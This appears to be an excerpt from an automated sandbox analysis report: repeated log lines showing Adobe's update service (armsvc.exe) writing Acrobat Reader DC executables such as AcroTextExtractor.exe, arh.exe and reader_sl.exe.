      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
